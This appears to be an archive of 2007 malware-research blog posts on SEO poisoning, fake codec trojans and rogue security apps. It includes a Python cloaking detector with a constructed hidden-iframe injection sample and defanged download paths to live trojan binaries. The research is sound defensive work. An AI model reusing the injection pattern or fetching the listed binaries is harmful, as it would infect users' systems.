More on the massive SEO poisoning — it was targeted at Google. And it was more crafty than we thought.

As a follow-up to our recent posts, here’s some additional information.

First, we can ring the all-clear bell. Google took action on these domains and you won’t find them anymore in Google.

However, check out this javascript:

(source: cxsjrkelgvjs(dot)cn/gopnikovnet(dot)js << malware site)

[screenshot of the script]

So, if you use search terms like “inurl” and “site”, you won’t see these malware pages in your results. Clever, since that’s one way malware researchers find this stuff (I recently wrote an article on the subject for VirusBulletin). And it only cares if you’re coming from Google.

Quite interesting.
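As an added illustration (not the script from the malware site, which the post only shows as a screenshot), here is a small static heuristic in Python that flags scripts showing the referrer-gating pattern described above. Both sample scripts are constructed for this example; the malicious one is modelled on the described behaviour, not copied from the real file.

```python
import re

# Constructed sample modelled on the behaviour the post describes (this is NOT
# the real gopnikovnet.js): act only for visitors arriving from Google, and
# back off when the search query carried the "inurl" or "site" operators.
SAMPLE_CLOAK_JS = """
var r = document.referrer;
if (r.indexOf("google.") != -1 && r.indexOf("inurl") == -1 && r.indexOf("site%3A") == -1) {
  document.write('<iframe src="http://example.invalid/x.html" width=1 height=1></iframe>');
}
"""

# Constructed benign sample: reads the referrer for analytics, no gating.
SAMPLE_BENIGN_JS = """
var ref = document.referrer;
_gaq.push(['_setReferrerOverride', ref]);
"""

# Each heuristic is a name plus the pattern that triggers it.
CHECKS = {
    "reads_referrer": re.compile(r"document\.referrer"),
    "tests_search_engine": re.compile(r"google\.|yahoo\.|bing\.|live\.", re.I),
    "tests_research_operators": re.compile(r"inurl|site(%3A|:)", re.I),
    "injects_hidden_iframe": re.compile(r"<iframe[^>]*(width|height)\s*=\s*[\"']?[01]\b", re.I),
}


def cloaking_indicators(js_source):
    """Return the names of every heuristic that fires on a script body, in CHECKS order."""
    return [name for name, rx in CHECKS.items() if rx.search(js_source)]


def is_suspected_cloaking(js_source):
    """Flag a script that gates on the referring search engine AND on research operators."""
    hits = set(cloaking_indicators(js_source))
    return {"reads_referrer", "tests_search_engine", "tests_research_operators"} <= hits


if __name__ == "__main__":
    for label, src in (("constructed cloaking sample", SAMPLE_CLOAK_JS), ("benign sample", SAMPLE_BENIGN_JS)):
        print(label, "->", cloaking_indicators(src), "suspected:", is_suspected_cloaking(src))
```

The heuristic is deliberately narrow: a script that merely reads the referrer (analytics, A/B tests) is not flagged unless it also keys on the search engine and on research operators.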

Alex Eckelberry
(Thanks to Sunbelt researchers Adam Thomas and Francesco Benedini)

New trend? Gromozon being installed as a rogue security app

Here’s a first — the Italian Gromozon, one of the nastiest pieces of malware in creation, being pushed in disguised form as a rogue antispyware security app.

[screenshots of the rogue security app page and installer]

(This same page also installs Malwarealarm, but through a different file.)

Incidentally, it’s also the first time we’ve seen Gromozon delivered not through an exploit but through social engineering.

VirusTotal results here.

Alex Eckelberry
(Credit to Sunbelt researcher Francesco Benedini)

Malware redirects: The aftermath

Hi all, Adam Thomas here from the Malware Research Team. I just wanted to post a follow up to our blog post yesterday regarding malware redirects from search engine results.

Sunbelt Software has uncovered tens of thousands of individual pages that have been meticulously created with the goal of obtaining high search engine ranking. Just about any search term you can think of can be found in these pages.

For example, the image below shows one page that focuses heavily on searches including the word “infinity”.

[screenshot: Search_example1]

This example shows hundreds of search terms for “hospice”. Pretty sick.

[screenshot: Search_example2]

For months now, our Research Team has monitored a network of bots whose sole purpose is to post spam links and relevant keywords into online forms (typically comment forms and bulletin board forums). This network, combined with thousands of pages such as the two seen above, has given the attackers very good (if not top) search engine position for various search terms.

In our previous post, we mentioned that the malicious pages also contained an IFRAME link which would attempt to exploit vulnerable systems. If you were unlucky enough to run across one of these links while surfing with a vulnerable system, you would become infected with a family of malware that we call Scam.Iwin. With Scam.Iwin, the victim’s computer is used to generate income for the attacker in a pay-per-click affiliate program by transmitting false clicks to the attacker’s URLs without the user’s knowledge. The infected Scam.Iwin files are not ordinarily visible to the user. The files are executed and run silently in the background when the user starts the computer and/or connects to the internet.

Scam.Iwin is also used to load malware for other groups. In this case, one of those malware groups is known to have been associated with the infamous RBN (Russian Business Network).

Links loaded by Scam.Iwin:

Exploits

So far we have observed the following malware being installed:

Trojan.Crypt.XPACK.Gen
Trojan-Downloader.Small.AAGX
Trojan-Downloader.Win32.Agent.ev
Trojan-Downloader.Win32.Agent.bnm
Trojan-Downloader.Win32.Agent.eus
Trojan-Downloader.Gen
Trojan-Downloader.Win32.Obfuscated.n
Trojan-Downloader.Win32.Small.ddx
Trojan-Downloader.Win32.Small.cib
Trojan-Proxy.Win32.Xorpix.Fam
Trojan.DNSChanger.Gen
Trojan.Win32.Patched.q
Trojan.Rawlam.C
Trojan.FakeAlert
Trojan.SpamThru (Spam-Bot)
Trojan.Netview (Information Stealer)
Trojan-Downloader.Win32.BHO.bt
Trojan.Win32.Pakes.bqt
Scam.Iwin
Dialer.Win32.GBDialer.i (v)
Backdoor.Rustock (spam-bot)
Trojan.Srizbi
Trojan-PWS.Win32.Bzub.gen (Information stealer)
Backdoor.Win32.Small.lu (Information Stealer)
Awola (Rogue Security Program)
Ultimate SecuritySuite (Rogue Security Program)

If your system was not vulnerable (i.e. your system is fully up-to-date with the latest patches), and you were duped into installing the “ActiveX Upgrade”, then you might simply be left with a toolbar installed into Internet Explorer as well as some pesky pop-up advertising for Rogue Security Software.

Of course, the team over at Google has been notified of this. Other search engine companies are welcome to contact us for more information.

Oh, what a tangled web we do weave . . .

Adam

BREAKING: Massive amounts of malware redirects in searches

We’re seeing a large number of seeded search results which lead to malware sites.

These are using common, innocent terms — one researcher landed on a malware site through searching for alternate firmware for a router.

For example, this search for “netgear ProSafe DD-WRT” yields these results:

[screenshot of the search results]

That site, luewusxrijke(dot)cn/769(dot)html, redirects to another site which pushes a fake codec (malware) and attempts to exploit vulnerable systems:

[screenshot of the redirect target]

This IFRAME leads to additional malware installs:

These malware distributors are using keywords to lure people into their sites (some example search terms here — PDF).

Some more examples, on innocent search terms.

[screenshots of further poisoned search results]

Clicking on these links will expose the user to exploits which will infect a vulnerable system (in other words, a system that is not fully up-to-date with the latest patches).

Alex Eckelberry
(Thanks Adam Thomas)

Another new fake codec — Windows and Mac

A new fake codec: codecvip(dot)com.

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: codecvip(dot)com/download/codecvip(dot)dmg; Windows: codecvip(dot)com/download/codecvip(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Bharath)

A clarification

Paul Andreason made a comment about Adult Friend Finder (AFF) that has been misconstrued by a large number of folks, resulting in some hate mail. This was exacerbated by a subsequent blog post I made about AFF, where I pointed out comment spam (not his). In the screen shot (since changed), Paul’s comment was next to the comment spammers — possibly leading people to believe he was on the side of AFF.

Paul does not support AFF in any way. As he puts it, “I was trying to point out that money was the reason they did that, and that morals and money don’t coexist in today’s world.”

Hopefully that sorts things out and he stops getting hate mail 😉

Alex Eckelberry

Here’s a turkey for you: Another fake codec site

[screenshot of the ultrahqcodec site]

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: ultrahqcodec(dot)com/download/playcodec1123(dot)dmg; Windows: ultrahqcodec(dot)com/download/playcodec1123(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Adam Thomas)

Irony: Truly, they have no shame

My recent blog post on Adult Friend Finder, critical of the company’s spamming methods, attracted some attention: from a comment spammer.

[screenshot of the spam comment]

Apparently from an affiliate, the Adult Friend Finder link points to medimenia.com and the homepage link points to ourfriendfinder.com. I’ve edited the links so that they are no longer live — why help these slimeballs?

Alex Eckelberry

Why I need to up my life insurance plan

Sandy, in our sales department, is pursuing his dream of becoming a helicopter pilot.

Unfortunately for us, he has taken to buzzing the Sunbelt building during his training sessions. Waving happily as he goes by, we all sit mute in terror as this neophyte pilot flies by.

[photo of the fly-by]

Dan, our webmaster, took a shot of Sandy doing a fly-by.

Pray for us.

Alex Eckelberry

Example of a money transfer scam site: usps-mailcorp

[screenshot of the usps-mailcorp.com money transfer scam site]

Other sites on the same IP one might consider avoiding are:


Patrick Jordan

OOF spam suppression

I’m a member of a number of lists, and always get blasted with Out of Office replies when I post. There’s a handy-dandy switch introduced in E2k3 that gets rid of this annoyance.

In Exchange 2003, it is now possible to modify the Out Of Office behaviour to help in these situations. A new registry key exists that prevents the sending of Out Of Office responses unless the recipient is explicitly listed in either the TO: or CC: fields of the message. Since mailing list posts aren’t addressed explicitly to list members, the suppression of Out Of Office responses to mailing list members is achieved.

To enable this feature, add the DWORD parameter SuppressOOFsToDistributionLists with a value of 1 into the following registry location:

HKLM\System\CurrentControlSet\Services\MSExchangeIS\ParametersSystem
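An added example (not from the original post) that audits the value described above and sets it only when it is missing or not 1; it assumes it is run elevated on the Exchange 2003 mailbox server itself.

```powershell
# Added example: check and, if needed, enable SuppressOOFsToDistributionLists
# on an Exchange 2003 server. Assumes an elevated PowerShell session on that server.
$KeyPath   = 'HKLM:\System\CurrentControlSet\Services\MSExchangeIS\ParametersSystem'
$ValueName = 'SuppressOOFsToDistributionLists'

if (-not (Test-Path $KeyPath)) {
    throw "Key $KeyPath not found; is this an Exchange 2003 mailbox server?"
}

# Read the current value, if any (missing value means default behaviour).
$current = (Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue).$ValueName

if ($current -eq 1) {
    Write-Host "$ValueName is already 1: OOF replies to list- and BCC-delivered mail are suppressed."
} else {
    # DWORD value 1 enables the suppression; anything else leaves Exchange at its default.
    New-ItemProperty -Path $KeyPath -Name $ValueName -PropertyType DWord -Value 1 -Force | Out-Null
    Write-Host "$ValueName set to 1 (previous value: '$current')."
}
```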

More here.

Alex Eckelberry

Upcoming seminar on email archiving in New York

Sunbelt’s coming to the Big Apple.

You’re invited to a free seminar on Email Archiving, hosted at the Microsoft office in Manhattan on Thurs, Dec. 6, from 9 – 12.

Join Mike Osterman, president and founder of Osterman Research, Inc., a leading analyst firm on messaging, for an engaging discussion on “Implementing an Effective Email Archiving Strategy for Exchange.”

Mike will be discussing how an effective email archiving strategy can help you deal with the issues resulting from growth in email storage, new e-discovery, and privacy requirements and explain the need for organizations to automatically archive content and make it readily accessible to anyone in the enterprise that needs it – all while reducing the cost of managing messaging-related storage.

Agenda:

  • Learn how to get a handle on growing email archiving and storage issues
  • Understand the importance of compliance, eDiscovery and legal readiness
  • Discover the cost-savings benefits to proper archiving, including faster backup/restore time, knowledge management and disaster recovery
  • See a live demo of Sunbelt Exchange Archiver in action: 80% message store reduction, end-user lost email self-service, improved performance and much, much more
When: Thurs., Dec. 6
Time: 9:00 a.m. – 12:00 p.m. (Continental Breakfast Included)
Cost: None
Location: Microsoft
1290 Avenue of the Americas, 6th Floor
New York, NY 10104

Click here to register.

Alex Eckelberry

The Kindle

I have been a huge believer in the power of ebooks for a long time. Now, Amazon has released the Kindle.

The technology is very cool, and it looks like it’s been well-implemented.

However, it’s got to be the ugliest piece of hardware I’ve ever seen.

If you’re interested, it’s worth reading the customer reviews. And watching the video.

I’d push my wife to get it for me as a Christmas gift (even if it didn’t have a huge amount of content, the gadget pull might be strong enough), but it’s so ugly that the “tech-lust” factor is kind of ruined.

Just compare the look of the ungainly Kindle to the sleek Sony Reader:

[photos: Sony Reader and Kindle]

Curious to know your thoughts.

Alex Eckelberry

Another fake codec: dltsolution

Heads up on this new fake codec, dltsolution(dot)com.

Incidentally, here’s what your system looks like after installing this thing:

[screenshot of the infected desktop]

As an aside, VirusProtect is removable from Add/Remove:

[screenshot of the Add/Remove Programs entry]

But good luck, it won’t get rid of everything:

[screenshot of what remains after removal]

Anyway, in the case of this site, a sample binary can be found at dltsolution(dot)com/download.php?id=4082. And please — don’t touch this Trojan unless you know what you’re doing.

Alex Eckelberry
(Credit to Patrick Jordan)

We’ve shipped our new email archiving tool

Pretty nice product, if I might say so myself.

CLEARWATER, FL–(Marketwire – November 19, 2007) – Sunbelt Software, a leading provider of Windows security and management software, today announced the release of Sunbelt Exchange Archiver, its new email archiving solution for Microsoft Exchange environments. Sunbelt Exchange Archiver (SEA) delivers cost-effective enterprise-class email archiving for organizations of all sizes, providing administrators with intelligent features such as integrated Hierarchical Storage Management (HSM), Direct Archiving for instant archival of incoming mail, full email continuity and disaster recovery, and seamless integration with Microsoft Exchange, Outlook and Outlook Web Access (OWA).

SEA combines efficiency and innovation to give organizations a powerful email lifecycle management system that offers tamper-proof, long-term storage of emails with easy retrieval capabilities and full-text searching. SEA enables companies to preserve all electronic messages on a broad range of storage media, offloading the strain on Exchange servers.

More company propaganda here.

Alex Eckelberry

Direct Revenue is dead. Sort of.

We’ve written before about Direct Revenue’s demise.

However, it’s still too early to say that this bugger is dead. We’re still seeing Direct Revenue binaries and sites out there.

They have 64 known sites that are still assigned IP addresses and DNS servers, which makes them active even if they cannot be accessed any longer, and 25 are active and also still registered to them under their thinkingmedia.net business name. The majority of the sites do not expire until the January through August 2008 timeframe.

Since the end of 2005, when Direct Revenue claimed they were cleaning up their act, they went through all the servers where they stored their adware files and selectively removed only the main adware BHO DLLs, leaving all their other components as live downloads.

Until they let every one of their sites expire, delete all their files on the servers, and cancel their services for their sub-domains, it’s too soon to say that this group has ceased operations.

Our latest site list is here (pdf). We also have a list of active binaries we are tracking, here (pdf).

Alex Eckelberry
(Thanks to Patrick Jordan)

New fake codec trojan variant — Windows and Mac

I rather think the name of this site is fitting:

[screenshot of the bsplaycodec site]

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: bsplaycodec(dot)com/download/playcodec1123(dot)dmg; Windows: bsplaycodec(dot)com/download/playcodec1123(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Patrick Jordan)

Adult Friend Finder

I loathe this site. Putting aside the dubious moral issues, it’s routinely pushed in social networking spam (such as Myspace), and it’s been advertised heavily in malware. Maybe it’s pushed by affiliates and not the company, but we’ve all heard that argument before. It’s still the company’s responsibility.

Now it looks like the site may have been acquired — and one of the rumored buyers is Penthouse Magazine. The size of the deal might be as high as $500 million.

Taking a look at a Wikipedia entry for the site is disturbing:

A key feature of their online advertising system is pictures of attractive women supposedly living local to the website user. This is achieved by IP-localisation software. On the AFF website (as with many other similar sites), some advertisers (usually female) use faked details to entice others, including fake photographs. Some of the photographs known to have been used include those of well-known porn stars and similar…A velocitypress.com study showed that the male-female ratio is 10 to 1, that 2/3rds of the claimed subscribers have not visited the site for over 3 months and that nearly half of the women were angling for lesbian relationships.

What a circus.

I hope the acquiring company knows what it’s getting into.

Alex Eckelberry

New fake codec: playcodec

[screenshot of the playcodec site]

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: playcodec(dot)net/download/playcodec4327(dot)dmg; Windows: playcodec(dot)net/download/playcodec(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Incidentally, one site doing a good job of keeping up with fake codecs is http://peki.blogspot.com/.

Alex Eckelberry
(Thanks Bharath)